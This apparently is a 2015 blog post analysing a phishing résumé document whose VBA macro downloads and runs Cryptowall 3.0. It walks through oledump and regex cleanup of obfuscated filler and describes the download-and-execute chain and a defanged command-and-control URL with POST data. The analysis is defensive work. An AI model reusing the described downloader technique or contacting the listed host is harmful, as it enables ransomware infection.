Thursday, August 13, 2015

Cryptowall 3.0 downloaded and executed from "William_Isabella_resume.doc"

Recently I was provided a phishing email with an attachment called "William_Isabella_resume.doc".  As I had done in the previous post I used "./oledump William_Isabella_resume.doc" to examine the contents for a malicious macro.  Below is the output of that command.

./oledump.py William_Isabella_resume.doc
 A: word/vbaProject.bin
 A1:       375 'PROJECT'
 A2:        41 'PROJECTwm'
 A3: M   40002 'VBA/ThisDocument'
 A4:      8271 'VBA/_VBA_PROJECT'
 A5:       514 'VBA/dir'

As you can see, item A3 contains a macro.  Then by selecting A3, I output the macro to a text file.

./oledump.py -s A3 -v William_Isabella_resume.doc > macro.txt

I immediately started looking at the macro and noticed a pattern of lines that were repeated with varying length of variables but contained a similar structure.  Two examples of the pattern are below:

Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
ACIZjEo8pvcIr = 80
I3wVba3qWHhnCuC = 19
If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
Else
MsgBox 45
End If

Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
AI9EyT0hz = 55
LDwIMi8qU8zv = 92
If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
LDwIMi8qU8zv = AI9EyT0hz + 8
Else
MsgBox 87
End If

With this pattern I wanted to created a regular expression to 1st find only the matches for the following pattern:  Dim <var> As Long <var> As Long

So I used the following grep statement to build my population: cat macro.txt | egrep "Dim.*":
**Dim Nz7m0PxKYWw As Long, HbS1melaNAS7H As Long, L7N3MtqbtznJ As Byte, HmKeQofQiXVxVGCT() As Byte, L9EY5PIy8XL As Long
Dim LvAzbXXkWUDtDQ() As Byte
Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
**Dim FP3AL83PNIVhYqp As Long, Bhu6AVZ As Long, HzD7nSW As Long, IFHWQgDBF4yZ As String * 8162, JkOPSi As String, I0xSQ As Integer, YBoXWN0Xv As Double
Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
Dim BkbpvlCIZj As Long, VS1rCLO33mU As Long
Dim ILWUKAm As Long, JRN9ZgNj6Yf As Long
Dim WqZT6KvAVkyO As Long, OHPW2b0ZGFa As Long
Dim HbUu4uL As Long, GfUsdMAvdCRNJDXy8 As Long
Dim AizpYIBM As Long, BYtWR9n2OwKs As Long
Dim Izv2Cof As Long, Ntxt3NxnUsY As Long
Dim V0fF89S As Long, HVcFPWU6 As Long
Dim K1Xi As Long, QZlNuLHUlh7Q2xe As Long
<..smip..>

So I started with the above population.  Notice that there are a couple of lines that I have preceded with a double asterisk that I need to eliminate with the regular expression. Using rubular.com I derived a regular expression that would match the Dim <var> As Long <var> As Long.


Then I used egrep to test the regular expression and display the next 7 lines after the regular expression to see if I was pulling into my population any false positives.

$ cat macro.txt | egrep '^Dim\s[A-Za-z0-9]{4,20}\sAs\sLong,\s[A-Za-z0-9]{4,20}\sAs\sLong\s$' -A 7
Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
ACIZjEo8pvcIr = 80
I3wVba3qWHhnCuC = 19
If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
Else
MsgBox 45
End If
--
Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
AI9EyT0hz = 55
LDwIMi8qU8zv = 92
If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
LDwIMi8qU8zv = AI9EyT0hz + 8
Else
MsgBox 87
End If
--

Scanning through the results no false positives were noticed.  Now the trick is using the regular expression and eliminating the 7 lines after it.  A tool called 'sed' can help us with it.  With sed you can use the regular expression but you need to escape the '{' and '}' characters.  So by running the following command in sed with the regular expression and telling it to remove the 7 lines following the regular expression I was able to remove the repeating pattern in the macro.

$ cat macro.txt | sed '/^Dim\s[A-Za-z0-9]\{4,20\}\sAs\sLong,\s[A-Za-z0-9]\{4,20\}\sAs\sLong\s$/,+7d' > modified.macro.txt

With utilizing the command above I was able to decrease the size of the macro in lines from 671 lines to 287 lines of code:

$ wc -l macro.txt 
671 macro.txt

$ wc -l modified.macro.txt 
287 modified.macro.txt

Then sifting through what is left a couple of key functions are noticed:
FP3AL83PNIVhYqp = InternetOpenA(

Then it checks if FP3AL83PNIVhYqp returns anything.  You can look up InternetOpenA online to understand what it does.  The user agent that can be pulled is the following:
Mozilla/4.0(compatiable; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001)

Bhu6AVZ = InternetOpenUrlA(

Then the previous line in the vb will pull down the cryptowall malware as a file called 1.jpg.  The 1.jpg is the cryptowall malware however it is scrambled.  Then it is saved to the "C:\users\<user>\AppData\Roaming" folder as an executable file.

Then in another function as the flow of the application goes calls the executable and runs it as a process with "CreateProcessA".  The executable then sends a POST request to the following URL:

URL: hxxp://fortecegypt.com/blog/wp-content/themes/twentyfourteen/rrr.php?g=pzh8956b2ulluj
POST DATA: z=b8bc08ed80fdb74f01125a4d61b6879af88a5aa0f09dd28ee540b25c983ae350ad13f2a891d7b22fdddc7797fef1800cf4360057


No comments:

Post a Comment

Powershell - Gather Mapped Drives from a List of Computer Names

I created the following Powershell script to gather remotely the mapped drives that users had in their profiles.  I had to create the script...